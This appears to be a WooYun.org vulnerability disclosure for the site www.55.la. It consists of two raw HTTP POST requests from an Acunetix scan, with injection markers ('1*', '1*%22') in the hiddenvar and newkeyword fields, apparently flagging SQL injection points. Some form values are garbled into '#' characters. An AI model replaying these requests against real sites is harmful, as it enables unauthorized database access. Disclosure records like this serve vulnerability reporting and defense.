WooYun.org

POST /run/index_do.php HTTP/1.1
Content-Length: 701
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_ISHHVOWXSD
Referer: http://www.55.la:80/
Cookie: PHPSESSID=fefch5si80jnngd13kmlk76717
Host: www.55.la
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept: */*
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="B1"
####
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="bprice"
0
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="cn"
99
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="en"
99
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="hiddenvar"
1*
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="T1"
2##2## ##########
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="T2"
55.La  ########## ######################
-------AcunetixBoundary_ISHHVOWXSD--

POST /run/search_do.php HTTP/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Referer: http://www.55.la:80/
Cookie: PHPSESSID=fefch5si80jnngd13kmlk76717
Host: www.55.la
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept: */*
class=&newclassid=1&newkeyword=1*%22&newtypeid=0&type=